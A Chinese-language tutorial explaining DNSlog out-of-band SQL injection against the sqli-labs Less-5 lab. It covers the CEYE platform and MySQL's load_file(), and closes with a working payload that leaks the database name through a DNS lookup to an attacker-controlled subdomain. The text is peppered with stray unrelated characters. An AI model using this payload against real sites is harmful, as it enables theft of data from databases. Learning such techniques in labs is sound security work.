原理
在sql注入時為布爾盲注、時間盲注,注入的效率低且線程高容易被waf攔截拳恋,又或者是目標(biāo)站點沒有回顯,我們在讀取文件砸捏、執(zhí)行命令注入等操作時無法明顯的確認(rèn)是否利用成功谬运,這時候就要用到我們的DNSlog注入。
使用平臺
CEYE
CEYE是一個用來檢測帶外(Out-of-Band)流量的監(jiān)控平臺垦藏,如DNS查詢和HTTP請求梆暖。它可以幫助安全研究人員在測試漏洞時收集信息(例如SSRF / XXE / RFI / RCE)。
過程
CEYE
Identifier是你的地址
這個CEYE到底怎么用呢
CEYE會分配一個三級域名如:xxx.ceye.io,你訪問任意一個四級域名系統(tǒng)就會自動記錄你訪問的四級域名,如:test.xxx.ceye.io
http://10.10.10.154/sqli/Less-5/?id=1 sqli的第五關(guān)
無回顯
這里使用mysql中l(wèi)oad_file()函數(shù)
LOAD_FILE(file_name)
讀取文件并返回文件內(nèi)容為字符串掂骏。要使用此函數(shù)轰驳,文件必須位于服務(wù)器主機(jī)上,必須指定完整路徑的文件弟灼,而且必須有FILE權(quán)限级解。 該文件所有字節(jié)可讀,但文件內(nèi)容必須小于max_allowed_packet田绑。
如果該文件不存在或無法讀取勤哗,因為前面的條件之一不滿足,函數(shù)返回 NULL掩驱。
在MySQL5.0.19芒划,character_set_filesystem系統(tǒng)變量控制文件名的解釋冬竟,即僅作文字字符串。
CEYE會記錄
這樣就會獲得當(dāng)前數(shù)據(jù)庫名
直接去拼接就OK了
' and if((select load_file(concat('\\',(select database()),'.XXXXX.ceye.io\abc'))),1,1)--+
